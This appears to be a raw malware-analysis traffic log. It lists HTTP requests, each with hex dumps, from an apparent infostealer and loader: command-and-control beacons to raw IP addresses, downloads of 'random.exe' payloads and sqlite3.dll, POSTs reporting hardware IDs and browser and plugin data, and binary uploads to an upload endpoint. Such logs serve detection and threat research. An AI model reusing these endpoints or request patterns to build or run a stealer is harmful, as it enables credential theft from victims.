Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: /Content-Length: 63842Content-Type: multipart/form-data; boundary=------------------------F6Kt4zmRl4u7Vp1IRRQ2QmData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 36 4b 74 34 7a 6d 52 6c 34 75 37 56 70 31 49 52 52 51 32 51 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 65 64 61 62 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 11 09 f9 b5 66 22 f1 26 3a 44 bc 01 66 15 08 04 49 b6 cf 3b 1e 13 11 78 b4 c9 43 c6 6f fa cc d2 cc dc e0 4d 06 d5 b0 b2 7e ce eb 11 3c 66 b4 50 ab c6 fe ed 51 f1 1a 87 55 81 1d 74 24 07 85 6c a6 06 ff de cb 95 4a 8e 20 0f 4f 38 f9 3c ea 88 45 51 b5 53 49 49 42 7d 89 8d f3 8a 82 40 67 d4 c7 46 bb 89 52 22 06 08 2c 2f 27 fd 2d d1 cd 8d 4f 0c 28 ea e7 1f a3 e8 16 f0 9c 66 69 68 3b b6 23 ac 84 33 5d 7c 1d 72 f7 26 48 a3 90 37 05 c0 f7 32 3f 9d b0 db 0d a9 58 c0 3a f7 e1 df 60 1a 25 1f 81 e3 14 98 ec 74 19 9b ef 5d db de 38 95 ef 6f 6b 4e ff 55 86 3f 84 cc 96 7c 30 d7 be 9e 77 cf 6b 89 dd 44 54 e5 02 b8 cd 55 bd 98 11 bf e4 6c 2c 4b 43 cd 07 3f 5e 5b f4 c7 f0 f7 a6 f7 80 ef 1c 7c 11 e0 c7 f0 0d 40 d3 d8 f5 f1 e7 64 a9 b9 e0 ca b3 24 62 b2 38 e4 af 5b d1 6d 71 0b bd 8b 42 ba 4f 98 66 14 fd e5 26 15 25 26 cc 14 33 59 0d 86 80 7f bd 8b 20 b5 22 71 13 f4 06 a1 97 f0 97 4d 5d ad 2f dd 9f ef e8 68 74 6a 6e 64 64 fa 09 52 d6 6d 15 e9 42 0a 14 12 ff 96 be d2 f1 9a b2 1a 4a 14 68 32 2f 4c 8d 4a 9d f6 03 58 f2 09 00 08 e0 31 06 4d a5 19 9a 3e dc e5 da b2 a0 d2 4a 0d 6c c1 40 cd fa 1c c4 6c d8 cc 07 83 24 d1 ae 29 f6 2a 95 f8 5a 72 6e fa 12 68 ff d5 7b 36 5b c2 82 cd c0 3d ff 65 af 46 b3 cf 30 f3 b3 8c c8 95 07 ed a9 c6 e8 2b bb 90 e9 a9 d4 09 c8 70 47 ed 33 17 50 10 2b a1 12 e1 b5 96 4c 27 8d 0d 4d b8 fd cf 3f 02 da 46 02 85 68 21 d8 12 ae 43 06 a1 52 b5 6c 2a 5c bc fe bb 7f 68 0f 71 ef 27 da 45 31 c7 24 09 a6 ec 3d 57 45 7c 1f 02 fc e4 66 c1 2c b1 28 05 4c 75 8c 41 01 75 7c 1a 89 79 8d b0 62 e5 37 db 76 19 bc aa 8d 2c eb f7 12 b3 fe 92 02 24 10 99 be 19 16 be 5e eb 68 af ee 02 a8 60 0f 05 48 b6 49 2a 60 06 9f f7 05 8d 84 54 3d 82 56 d7 36 e8 cf d7 2b 44 56 5d e9 fc b5 0a 13 97 f6 8c 1f 38 2d 0c af 23 54 59 80 7b fd 5e fc 12 2b 3b fd b2 68 8a 9b ba c2 e2 32 06 cd e4 e1 54 fd 04 29 bd b8 d5 a7 c7 ba 97 b5 3a 63 9f b0 e5 9a 29 64 35 43 45 80 e8 95 80 5a 45 47 da a7 68 df 97 f6 d9 3b 97 c5 87 bf 6c 2b 01 3f 5b ba a1 91 6e f4 bd 95 ac f2 32 30 e8 cb 32 8f 8d 31 56 92 23 37 a2 0f 9a 87 bf 4e 6a c9 94 8c 87 2d da e5 27 6b a4 e7 5b cb 6b ac 8f 2a ab 9e 55 a9 80 d5 43 4b 2c 71 78 4d 48 f2 16 21 3b d1 b9 80 05 5e 06 af 21 1a ca 1f 86 30 61 d1 07 04 65 58 77 bb 22 00 53 a2 4b 4c 7a 04 63 e4 aa 7c 87 a8 1b eb db 7d 05 bf 5c eb 0c a8 c4 0a e3 4b 10 7c b9 2f f4 6b 89 f0 59 7c 8f 34 a3 31 20 0c 2c 07 e3 fe c6 d3 84
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019809001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019810001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019811001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 42 37 45 33 44 43 45 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"E36B7E3DCE4E758809014------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"stok------EBKKKEGIDBGHIDGDHDBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="message"browsers------ECBKKKFHCFIDHIECGCAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 2d 2d 0d 0a Data Ascii: ------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="message"plugins------DHCGIDHDAKJECBFHCBAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="message"fplugins------KFIEHIIIJDAAAAAAKECB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019812001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: 185.215.113.206Content-Length: 8275Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: /Content-Length: 27550Content-Type: multipart/form-data; boundary=------------------------LD6ZS6L8rUHFQ5ehyM7ZrTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 44 36 5a 53 36 4c 38 72 55 48 46 51 35 65 68 79 4d 37 5a 72 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 6a 69 63 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0f db fc 92 00 a4 b4 b4 17 2d 84 27 24 e9 64 cc c5 55 b2 88 bd 02 13 a9 01 7e 49 8e a5 e7 65 2b 5d ac 6f 05 0d 41 f6 2a c6 9e 47 6c da ec 9b 40 83 ac 49 6f 82 1c 97 7e 92 b7 7c 37 d6 57 19 84 60 22 33 9d 97 87 a5 9f 18 e7 28 6e f6 ca 74 54 80 12 63 80 92 21 40 f2 0f 52 20 3f a0 bb 63 ec 28 a0 b2 6e 89 d5 55 eb b5 ba 8c 91 a2 c6 66 d0 29 4e bf 40 5d 22 19 66 c0 17 87 8a 62 de 7b 3f a6 e5 74 82 c0 c9 49 84 b6 ba 20 85 dc cd ea 54 c6 98 e0 fc 39 1c 16 d2 ea 15 e1 3e 1f 16 a0 ed a6 1c 3b 14 be ff 09 05 75 76 5f 21 2c 5e ca 63 35 1e d8 50 d8 d5 c4 02 ea 38 bc 26 1c 43 60 41 59 1f 2c b2 0d 26 1d 4d e2 90 07 2d 90 a1 c2 0b e2 ec 89 1d 09 59 08 a6 4b c3 18 17 a4 a8 cd 25 49 ce 0d dc 77 19 6d 40 33 6e 52 6c 58 a3 6c a5 11 e5 a0 2c c5 32 4d 4e da 72 21 aa 88 cb a7 49 3e d2 e6 14 d3 4a 6f 10 4e 8b 92 1d 81 ff fc 0b 9d ab 2e 31 a3 1e 0c 94 3f 25 21 22 7c 2b 05 49 f9 fb 98 37 9f b6 ca fc 12 60 ce f6 b9 3f 1f 82 57 7b 8f 2d 93 0f f2 10 91 6f 56 d2 fc 48 c6 e8 51 59 c2 b4 65 67 eb d8 7d a8 ad f8 0b bd ef 2a 44 2a ed 40 d3 a7 a4 da 4c 61 4d 47 23 f3 db 2c 91 87 db 84 9b a1 72 7b 04 6a 00 0e ba 75 c8 ae 2b 53 85 ee a3 c7 13 7e 1d 96 ed 99 b2 1e 50 12 e9 51 51 d2 be e2 4b 69 96 1c d1 95 83 f6 40 d5 ff 5c f0 c7 b9 ff 19 ca 75 e9 66 93 92 4a 28 d8 6e 84 bf 30 8e 63 c5 06 9f 25 e1 fe 1a 91 7a 36 96 17 f4 65 ea 5c 6e 48 aa 84 3e b9 e3 4b 43 9f d3 92 e0 37 0d ac fc 82 47 33 00 db a8 40 de 62 b3 bb 77 e1 13 ab 90 ac f4 d3 0d e3 29 39 2f 46 2d d6 db c9 9d c6 6b 67 6b ec e9 d2 60 7d 45 e8 3d 69 61 85 c0 b0 b8 bb 6e 42 05 6d 77 36 c5 22 45 e7 71 04 c1 e3 c2 14 b3 63 a7 61 f2 52 87 ad e0 8b 88 ab 3d 1b 2b e9 87 24 b1 04 f3 db e9 13 49 bb a2 1c cf 26 72 c0 07 66 0a 93 b3 92 dd 78 3a 20 6c dd e0 6c 01 56 70 51 a6 37 16 2d f1 f3 e6 e2 c6 df ee 73 14 ca 7d ad 93 2d 6c 79 dd a0 c0 e9 9b f9 42 83 50 85 40 21 4e 38 69 e2 41 6b 18 82 02 eb 3f 2c ce f1 c7 78 d7 7d 71 65 f7 da ef a3 d0 a6 7f 53 95 23 f3 37 c6 3d 94 94 cf 0a 52 4f 02 9c 3c 1e d8 eb 8f 5f 33 bd 6b 79 d9 d8 b6 69 ba 8c ea 2a fb 81 05 86 5c 7d e0 6d 88 04 b4 79 b7 59 39 bb 2b 04 5c a1 57 16 0e 57 d7 16 eb 67 86 39 62 e9 08 dc 9f c1 a5 78 b6 5a d5 ee e8 64 63 f1 c0 26 cb 80 6d 31 a1 3b d7 40 c2 cf 21 23 dd 9e 26 51 6c b6 a4 55 18 31 ab 0f c5 af 07 d1 db 89 32 cc ed f7 ab 40 5a 72 12 18 92 5c 12 fd 13 c7 26 9c 41 a9 f9 84 75 83 1e 28 5f db fb a8 68 52 03 d6 09 a9 99
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
